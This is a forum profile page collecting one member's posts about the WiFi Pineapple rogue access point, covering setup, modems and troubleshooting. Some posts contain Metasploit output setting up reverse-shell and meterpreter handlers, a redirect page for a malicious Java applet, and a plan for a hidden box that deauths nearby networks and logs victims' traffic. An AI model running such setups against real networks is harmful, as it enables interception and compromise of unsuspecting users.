Jump to content

telot

Dedicated Members
  • Posts

    803
  • Joined

  • Last visited

  • Days Won

    12

Posts posted by telot

  1. Hi all

    I have afew questions:

    1, I've just setup my pineapple to work with a 192.168.0.x LAN however since i have done this i cannot get access to the device what so ever? how can i factory reset it back to the normal 172.42.16.x IP setup as the reset botton on the back does not do anything?

    2, How much is a mark III (AP51 hardware, latest firmware, usb powered) worth? as i might sell it?

    Finally, 3, Does anyone else agree, that Snubs, is soooo damn hot :D :D :D :D :D

    Thanks guys, appreciate any feedback!

    J

    1. To my knowledge the reset button doesn't reset anything. (COULD BE WRONG!). Best thing to do is reflash your firmware and access it with 172.16.42.1/pineapple See the hundreds of posts Mr. Protocol has done on this - he is the reflash god.

    2. The hardware retails (new) at around $35-50. Used I have no clue.

    3. Duh.

    telot

  2. Was going to recommend PTES but you beat me to it.

    Link to the video:

    http://www.irongeek.com/i.php?page=videos/derbycon1/the-penetration-testing-execution-standard-ptes-panel

    God I love irongeek for posting all the hackercon videos...we need to get his ass in these forums. If you know him digininja, send him a note saying

    1. To quit getting hacked ;)

    2. To get in on hak5 forums - he may already be his own media mogul, but he should join this crew too!

    telot

  3. I played with a script a while ago that changes the pineapples (mk3) channel and does an airodump-ng mon0 --channel 1 --write CH1capfile. I'll look around for it. Once grep'd out, you could have a whole new list on the status page of nearby AP's that people might be connected to and a list of potential targets.

    That way you're seeing your competition (legit APs), seeing your "customers" (targets), and which customers are being stubborn at coming over to your place of business...which is selling fresh pineapples right? :) That way you can do some digging (market research if you want to continue the metaphor...) and find out why they're not attached to you. It would give you a fuller picture of whats happening in the air all around you and the tools to alter it in real time.

    Hope this helps and FYI, if you need someone to beta test... :)

    telot

  4. I've pretty much learned the trick of supporting most GSM and CDMA modems. Both sdparm and usb_modeswitch are included. Usually it's just a matter of "ejecting" the USB CD-ROM so that the modem reveals itself, at which point a bunch of uci network commands set the config, pppd does its thing with chat and comgt.

    So basically any modem that's supported by usb_modeswitch should work. Here's a reference list of about 200 or so dongles:

    http://www.draisberghof.de/usb_modeswitch/device_reference.txt

    Also lemme just say it's freaking robust -- stays alive no matter what. Spent weeks on 3G and keep alive scripts alone and let me tell you it was such a good feeling the first time I got the pineapple completely self contained.

    Excellent! I was actually thinking of using one of my Digi International modems for this - they're temperature rated and built to be online for years at a time (they've got an advanced ping keepalive system called SureLink). But if what you say is true, maybe I won't need to go that route - I'll just go with the sprint! Thanks Darren for the clarification!

    telot

  5. All that refresh spam paid off, and finally ordered the pineapple, cant wait to receive it and play with it. Good job to all involved, really is a sick release

    Which models of 3G/4G dongles are supported? You mentioned that three are currently supported? Thanks for the first dibs! Can't wait!

    telot

  6. You definitely have an issue with your metasploit install. Try to reinstall it and update it with last svn sources:

    svn update

    Secondly, regarding your "No such file or directory" problem, I think the problem is that the quotes in your landing page configuration are not the correct ones (” vs ")

    Try to replace your landing page configuration with the following (with correct ones):

    <html>
    <head>
    <meta http-equiv="REFRESH" content="0;url=/java/run.html">
    </head>
    <body>
    </body>
    </html>
    

    Thank you for your response! I'm using the msf from BT5R1 live disk to get these results. I will update it and give it a shot and report back. Thanks Whistle Master

    telot

  7. Yet another! Please see my 543 posts about this exact topic. You can find most of them in the Jasager section of these forums.

    Either way, I love the idea and I too am working on a similar tool. Thanks for sharing your progress and I hope you continue to as it develops!

    telot

  8. Alrighty - sorry for the delay in my response, but I've been traveling the country and forgot my pineapple at home :(

    Here is the output of the ls -la commands:

    root@Pineapple:~# ls -la /www/ && ls -la /www/java/

    drwxrwxr-x 1 root root 0 Jan 1 00:03 .

    drwxr-xr-x 1 root root 0 Jan 1 00:02 ..

    -rw-rw-r-- 1 root root 616 Jan 26 2012 error.php

    -rw-rw-r-- 1 root root 106 Jan 1 00:07 index.php

    drwxr-xr-x 2 root root 0 Jan 1 00:03 java

    drwxrwxr-x 1 root root 0 Jan 1 00:04 pineapple

    -rw-rw-r-- 1 root root 214 Jan 26 2012 redirect.php

    drwxr-xr-x 2 root root 0 Jan 1 00:03 .

    drwxrwxr-x 1 root root 0 Jan 1 00:03 ..

    -rw-r--r-- 1 root root 73802 Jan 1 00:03 Qf8IYZJlKNMdl5

    -rw-r--r-- 1 root root 4124 Jan 1 00:03 Signed_Update.jar

    -rwxr-xr-x 1 root root 20800 Jan 1 00:03 mac.bin

    -rw-r--r-- 1 root root 134 Jan 1 00:03 nix.bin

    -rw-r--r-- 1 root root 14862 Jan 1 00:03 run.html

    Looks about right by me. My DNS Spoof Host box under Configuration on the pineapple reads as follows:

    172.16.42.1 *

    My Landing Page, again under Configuration on the pineapple is as follows:

    <html>

    <head>

    <meta http-equiv="REFRESH" content=“0;url=/java/run.html”>

    </head>

    <body>

    </body>

    </html>

    I start karma and start DNS Spoof from the Status page of the pineapple. Then I download/unzip pineapplepwn.rc msf script and open a terminal and run msfconsole -r pineapplepwn.rc and here is the output:

    root@root:~/Desktop# msfconsole -r pineapplepwn.rc

    [-] Failed to connect to the database: FATAL: no pg_hba.conf entry for host "172.16.42.249", user "msf3", database "msf3"

    {"adapter"=>"postgresql", "database"=>"msf3", "username"=>"msf3", "password"=>"eccd8310", "host"=>"127.0.0.1", "port"=>7175, "pool"=>75, "timeout"=>5} ["/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `initialize'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `new'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:968:in `connect'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:217:in `initialize'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:37:in `new'", "/opt/framework/msf3/lib/active_record/connection_adapters/postgresql_adapter.rb:37:in `postgresql_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:223:in `new_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:245:in `checkout_new_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:188:in `block (2 levels) in checkout'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:184:in `loop'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:184:in `block in checkout'", "/opt/framework/ruby/lib/ruby/1.9.1/monitor.rb:201:in `mon_synchronize'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:183:in `checkout'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:98:in `connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_pool.rb:326:in `retrieve_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_specification.rb:123:in `retrieve_connection'", "/opt/framework/msf3/lib/active_record/connection_adapters/abstract/connection_specification.rb:115:in `connection'", "/opt/framework/msf3/lib/active_record/base.rb:1271:in `columns'", "/opt/framework/msf3/lib/active_record/base.rb:1284:in `column_names'", "/opt/framework/msf3/lib/active_record/base.rb:1297:in `column_methods_hash'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `block in all_attributes_exists?'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `each'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `all?'", "/opt/framework/msf3/lib/active_record/base.rb:1986:in `all_attributes_exists?'", "/opt/framework/msf3/lib/active_record/base.rb:1842:in `method_missing'", "/opt/framework/msf3/lib/msf/core/model/workspace.rb:69:in `default'", "/opt/framework/msf3/lib/msf/core/db.rb:189:in `default_workspace'", "/opt/framework/msf3/lib/msf/core/db_manager.rb:166:in `connect'", "/opt/framework/msf3/lib/msf/ui/console/driver.rb:186:in `initialize'", "/opt/framework/msf3/msfconsole:130:in `new'", "/opt/framework/msf3/msfconsole:130:in `<main>'"]

    Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f

    EFLAGS: 00010046

    eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001

    esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60

    ds: 0018 es: 0018 ss: 0018

    Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

    Stack: 90909090990909090990909090

    90909090990909090990909090

    90909090.90909090.90909090

    90909090.90909090.90909090

    90909090.90909090.09090900

    90909090.90909090.09090900

    ..........................

    cccccccccccccccccccccccccc

    cccccccccccccccccccccccccc

    ccccccccc.................

    cccccccccccccccccccccccccc

    cccccccccccccccccccccccccc

    .................ccccccccc

    cccccccccccccccccccccccccc

    cccccccccccccccccccccccccc

    ..........................

    ffffffffffffffffffffffffff

    ffffffff..................

    ffffffffffffffffffffffffff

    ffffffff..................

    ffffffff..................

    ffffffff..................

    Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00

    Aiee, Killing Interrupt handler

    Kernel panic: Attempted to kill the idle task!

    In swapper task - not syncing

    =[ metasploit v4.0.0-release [core:4.0 api:1.0]

    + -- --=[ 716 exploits - 361 auxiliary - 68 post

    + -- --=[ 226 payloads - 27 encoders - 8 nops

    =[ svn r13462 updated 202 days ago (2011.08.01)

    Warning: This copy of the Metasploit Framework was last updated 202 days ago.

    We recommend that you update the framework at least every other day.

    For information on updating your copy of Metasploit, please see:

    https://community.rapid7.com/docs/DOC-1306

    resource (pineapplepwn.rc)> use multi/handler

    resource (pineapplepwn.rc)> set PAYLOAD windows/meterpreter/reverse_tcp

    PAYLOAD => windows/meterpreter/reverse_tcp

    resource (pineapplepwn.rc)> set LHOST 172.16.42.42

    LHOST => 172.16.42.42

    resource (pineapplepwn.rc)> set LPORT 443

    LPORT => 443

    resource (pineapplepwn.rc)> set ExitOnSession false

    ExitOnSession => false

    resource (pineapplepwn.rc)> exploit -j

    [*] Exploit running as background job.

    resource (pineapplepwn.rc)> use multi/handler

    resource (pineapplepwn.rc)> set PAYLOAD osx/x86/shell_reverse_tcp

    PAYLOAD => osx/x86/shell_reverse_tcp

    resource (pineapplepwn.rc)> set LHOST 172.16.42.42

    LHOST => 172.16.42.42

    resource (pineapplepwn.rc)> set LPORT 8080

    LPORT => 8080

    resource (pineapplepwn.rc)> set InitialAutoRunScript post/osx/gather/enum_osx

    InitialAutoRunScript => post/osx/gather/enum_osx

    resource (pineapplepwn.rc)> set ExitOnSession false

    ExitOnSession => false

    resource (pineapplepwn.rc)> exploit -j

    [-] Handler failed to bind to 172.16.42.42:443

    [*] Started reverse handler on 0.0.0.0:443

    [*] Starting the payload handler...

    [*] Exploit running as background job.

    resource (pineapplepwn.rc)> use multi/handler

    resource (pineapplepwn.rc)> set PAYLOAD linux/x86/shell/reverse_tcp

    PAYLOAD => linux/x86/shell/reverse_tcp

    resource (pineapplepwn.rc)> set LHOST 172.16.42.42

    LHOST => 172.16.42.42

    resource (pineapplepwn.rc)> set LPORT 8081

    LPORT => 8081

    resource (pineapplepwn.rc)> set ExitOnSession false

    ExitOnSession => false

    resource (pineapplepwn.rc)> exploit -j

    [-] Handler failed to bind to 172.16.42.42:8080

    [*] Started reverse handler on 0.0.0.0:8080

    [*] Starting the payload handler...

    [*] Exploit running as background job.

    [-] Handler failed to bind to 172.16.42.42:8081

    [*] Started reverse handler on 0.0.0.0:8081

    [*] Starting the payload handler...

    msf exploit(handler) >

    Now as I've said before, I'm a total metasploit noob. I'm only on the second chapter of securitytube's megaprimer on it. But even as a noob this output does not look good. Many fatal exceptions and Failed to binds. Pressing forward regardless, I connect my target machine to its Karma'd pineapple AP of Caribou (a local coffee shop's wifi). Which by the way, Windows7 pops up with a "Additional log on information may be required" bubble. Ignoring this I open Firefox and browse to www.facebook.com and get a white page that says "No such file or directory" and in the address bar is www.facebook.com/java/run.html" (with that end quote). Not only that, but when my attacking machine tries to browse the internet, it goes to www.hak5.org/run/java.html" - so the DNS spoof spoofed the attacking machines DNS as well?! This is the first time I've played with DNS spoof, so my noobery is again rearing its ugly head.

    Is it a problem with DNS Spoof? Is it a problem with the msf script? Did I make some noob mistake? Most likely I'm sure :) Any ideas or further advice would be greatly appreciated. Thanks very much!

    telot

  9. The java option automatically starts DNS spoofing. It should create a file in pineapple dir called up that echos the word "up" into it. That way the pineapple can tell when its on. When you stop it echos "" into it telling it its off.

    Check that the file up is in the pineapple dir and that its say up by "cat up" command when you have started the Evil Java.Thanks to Whistle Master for noticing that in the run.html have uploaded again and this time shouldbe fixed.

    I think we need some consistency here with this new Java attack. Theres lots of conflicting claims and none of them have been working for me. Anyone else having problems? I'm sure theres many ways to skin this cat. Reflex, since you discovered/initially designed this, could you do a once over on your instructions and fill in some gaps for us? Maybe I'm just a noob, but I'm having multiple issues and errors when trying to implement either solution (yours or Whistle Masters). Thanks for any help you can spare

    telot

  10. I've said it a million times already, but a raspberry pineapple is a recipe for win. I'm all over this shit man.

    The mark4, from what I understand, is a big step towards an all-in-one wifi pwnage box, but I have yet to determine (despite questioning darren and rest on these forums) if it has the horsepower to handle all the necessary tasks itself. Or will it still need a host computer (insert raspberry pi)?

    So to copy/paste from the other 10 threads I've mentioned this in...my dream dropbox will:

    Upon bootup connect to closest open wifihotspot, if no open hotspots exist, connect to sprints wimax network with 3g as backup (wimax for its no cap on data and speediness). It will then smtp me a message telling me its IP and that its connected and about to wtfpwn everything around it. Then it will rename its karma'd essid to either what I set it for before dropping it (targeted) or to the closest open wifi hotspot's name (coffeshop_wifi att_wifi etc), or default to "Free Wifi". It will start a tcpdump cap of everything on eth0 to external usb stick for later retrieval at pickup time or dial in via vpn/scp. It will then start karma. Then it will airdrop nuke every AP around it for 30 seconds or so and restart another airdrop-ng for 30 seconds every 5 minutes.

    So its preventing anyone from getting on a legit wifi hotspot, its bringing all the boys to the yard with karma, and its logging every packet that anyone connected sends. Its also announcing itself to me with its IP so I can dial in and make any changes I might want to or grab the capture file over the air.

    The more I think about it, perhaps the wimax should be the default provider of ICS to the pineapple, that way no one can deauth me, the attacker. Or sniff the traffic for that matter.

    I anticipate doing this with a rasp pi with powered usb hub, an alfa 036H card, fat 32gb usb stick, and a sprint 4g usb dongle. Along with a pineapple of course. I'm still trying to source good omni antennas for this project, along with a big fat battery. I'm also working on ideas for incognito cases...something that wouldn't look out of place - any ideas?

    So yeah, I've put some thought and effort into this (already begun scripting it) but would surely appreciate collaboration from any and all on these forums. The F-BOMB ain't got shit on the pineapple baby! And DARPA ain't got shit on hak5!

    telot

  11. Hmm I must be doing something completely wrong here, as this doesn't seem to work for me at all. Heres my scenario:

    Fresh reflash to 2.1.2

    Run wp3.sh

    Copy java to /www/ on the pineapple

    Copy contents of pineapple/ to /www/pineapple, overwriting all

    Browse to 172.16.42.1/pineapple

    Start karma

    Click Conf for java attack

    Copy/paste windows attack into my BT5 terminal

    Wait for it to load

    Go back to mainpage for pineapple (Status)

    Click "Start" for java attack

    And...nothing happens. It goes to the Entropy Bunny page (having cake) and back to the index, but the Java Attack is still disabled. I then tried modifying run.html to Whistle Masters modification, and still nothing. What am I doing wrong here? Granted I'm just getting into msf, and know next to nothing about Java. Despite it saying Disabled, I tried connecting to the pineapple with my victim (that has java enabled) and going to various websites, but nothing appears in the msf on the attacker machine. Any help you can send this noob's way would certainly be appreciated. Thanks!

    telot

  12. So I just got my new Alfa AP51 Router today, and just flashed it with the newest Mark III firmware. I logged in and got ICS going in windows 7 to test it out, logged into the "Free_Wifi" to see if its working and sure enough ICS is working. I have a few questions though. Please answer seriously, this is an attempt from a novice to probe some peoples minds and expand my own based on their recommendations and ideas, not a plea to walk me through hacking someones facebook or doing all the work for me. So here we go:

    1. To my understanding, the pineapple will only get connections from devices that have saved open unsecured networks on auto connect, However I noticed a few associations that said "Pass through Linksys, and Pass through NETGEAR" etc. So these wifi networks that are secure when I scan, so I am curious what the "Pass through" means? Did it just grab them?

    Also I am kinda new to Infosec and penetration testing and have been reading a lot lately. Besides trying to follow along with the videos on Hak5 and use the pineapple, I was curious what other people are doing with it? I got the pineapple thinking it would be really cool for me to play with at home and mess with my girlfriend on our network and just learn a bit more, but I must say its a bit confusing to me at first. I know a working knowledge of linux and some networking, and understand a lot of different attacks. Currently I am just using Wireshark and watching the stream from the interface sharing the internet with the pineapple as people are on it. Id like to try session hijacking myself but I need to get ferret and hamster going. So

    2. What are some things I can do with the pineapple? Id like to read up on more things people are doing and learn about.

    For now im going to just watch some traffic, and try to mess with ngrep a bit. Thank you for all your input.

    Pass through! A not so descriptive term. Here is a perfect chance to learn more and expand upon your wireshark skills. Using wireshark is all about filtering. Practice your skills by filtering through to an answer to this question and post it here :) I think this would be a great exercise for anyone with a new pineapple and a budding knowledge of infosec.

    You're certainly on the right path with Wireshark - its the end all be all MITM friend. But theres so much extraneous information that it can be very very very overwhelming. Goto securitytube.net and listen to the wifi god's (vivek) explanation of 802.11 packet formation and significance if you really want to learn it inside and out and get some great examples of proper wireshark use. I just got done with the Wifi Megaprimer and the amount of knowledge Vivek shares (for free!) is amazing. Plus hes pretty funny too.

    Some thing I've been doing with the pineapple...yes, ganking the wife's wifi connection is great fun, but theres waaay more you can do. Personally, I've been doing some hardware hacks (POE Cable: http://telot.org/betterusbpoecable5.jpg) and working on a case for to hold the raspberrypi(.org) and the pineapples PCB and a small battery pack in a conveniently nonchalant enclosure for a drop-box kind of system (like the mark4 will be). I've also done a little convenience scripting (http://telot.org/1script2rulethemall.sh) in preparation for the r-pi's automated attackings.

    Let us know how your ngrep goes - thats one area I really haven't messed with the pineapple. I'd love to see your wordlists.

    The pineapple is a great beginners tool and a great way to go head first into wifi security. Enjoy!

    telot

  13. Found this on the Apple support forum.

    "Internet Sharing is not configurable. At all. It always creates a network in the 10.0.2.0/24 block and routes it to 192.168.1.0/24."

    So here's how I just got it to work...

    Set your ethernet to the normal 172 address, and log into the pineapple.

    Go to configuration, and change the pineapple's ip address to 192.168.2.254, and the gateway to 192.168.2.1, hit update and reboot the pineapple.

    Now go back to the mac's ethernet settings and change it to 192.168.2.1, netmask to 255.255.255.0, and gateway to whatever ip address your wifi or whatever you are sharing to, mine is wifi, which is 192.168.1.133. Set a dns of your choice, I'm using google's 8.8.8.8.

    Pings from the pineapple don't work, but I get the internets from my laptop connected to "bobsfreewifi"... :rolleyes:

    https://lh6.googleusercontent.com/-bMzue73P7sM/Ty1hRLDA3wI/AAAAAAAAC-o/lCJ__WVjtQc/s1152/jasagernetwork.jpg

    https://lh6.googleusercontent.com/-den0m3a-4T8/Ty1hREF8X_I/AAAAAAAAC-w/YT7BRDWlw4Q/s1152/networksettings.jpg

    https://lh4.googleusercontent.com/-Y6tkM9_JSsQ/Ty1hRBl2ByI/AAAAAAAAC-0/qadve5TxsiA/s1152/inetsharloin.jpg

    Thanks for the heads up Barry - made my life tons easier!

    telot

  14. Hello, Elisa and welcome to the wonderful world of Jasager!

    I would suggest that you take a look here: http://hak5.org/hack/pineapple-phishing

    And if you need to know about dns spoofing begin with: http://en.wikipedia.org/wiki/DNS_spoofing

    There is a lot of information from the fantastic contributors on this forum. Try looking around and see what you might find. Using the search-function can save you from reading it all.

    It is always good to have some basic knowledge before attempting to start phishing those passwords for educational purposes. If you are able to build your own pineapple I am certain you will learn how to use it!

    And please remember that backtrack and jasager are no toys. Chances are that if you run around using it without conceptual understanding, you could go to jail or someone else could get hurt.

    h**p://www.youtube.com/watch?v=74-WSM0xTyE

    :-)

    With great jasager, comes great responsibility! I started my pineappley adventure just wiresharking the traffic on eth0 and having my wife connect to the pineapple and do her regular surfing. Then I started with ngrep (still don't have an optimal list going....) and aireplay -0 and then airodump from a alfa usb and then...and so on. This device is so magical because its such a great catapult into the world of wifi pwning - its opens so many doors and is so great at piquing the interest (at least for me lol). Enjoy your homemade pineapple and please feel free to post your educational progress here on these forums!

    telot

  15. I really wish I could help. I wanted to include a Mac tutorial in the quick start guide but to be honest I've never used a mac for any substantial period of time. Even when I did as a sysadmin it was mainly in the terminal.

    I'm picking up a used macbook pro today and will try ICS and maybe even a modify the wp3/1script2rulethemall.sh to work on snow leopard and then lion. I will report back here so stay tuned!

    telot

  16. So to those who have the mk4 - Seb, Darren, and of you lucky Shmooer's - can the 400mhz proc handle a tcpdump with the cap file being stored on a fat usb stick (32gb lets say) for later retrieval? If so, then this is the it. If not, and you still need a laptop providing ICS and wireshark/tcpdumping the traffic - then why not stick with the mark3? Maybe its just me, but my love for the pineapple is for its mitm attacking - no more stupid arp poisoning! I've got all the traffic already! Heres my dream pineapple:

    Internal atheros in master mode, serving up karma'd goodness.

    Eth0 & Eth1 being and interceptor on the wire

    usb port with 4 port powered usb hub. On the hub would be the usb alfa card for either connecting like a network monkey or deauthing or supplying 'clean' internet for the karma'd internal wlan, sprint wimax dongle (for unlimited goodness), and the biggest usb stick I can find.

    All with enough power to sniff and cap the karma'd victims, the intercepted wired connection - both dumping to the usb thumbdrive simultaneously (write speed would be super important here). It'd also run pptpd for vpn'ing in to retrieve the info via the 4g card.

    Are you making my dreams a reality with the mark4? Shall I still plan on utilizing the raspberry pi to accomplish all this? Thanks for the info and hard work guys - this device dynamited my love for hacking SoC's! Swoot

    telot

  17. Don't forget you need to keep the antenna section straight. You'll get some funky signal issues if you bend it.

    Damn thats one helluva battery! 11k mah! What I don't understand is why you don't power it off your laptop via PoE and instead invest the money in a big fat laptop battery? I guess if you have a small SoC you're running wireshark on (like my beautiful beautiful Raspberry PIneapple will) and you need the same battery to power both this would work great.

  18. Could Mr-Protocol please post which version of the WUSB600n he has that works 'out of the box'. v1 chipset Ralink RT2870, v1 chipset Ralink RT2850 or v2 chipset Ralink RT3572.

    Just want to make sure I buy a compatible version.

    Comeon Mr. Protocol! We're waiting over here with our cursors over the "Buy Now" button! Haha, you mind letting us know what version you have? I'd love to get my n on

    telot

×
×
  • Create New...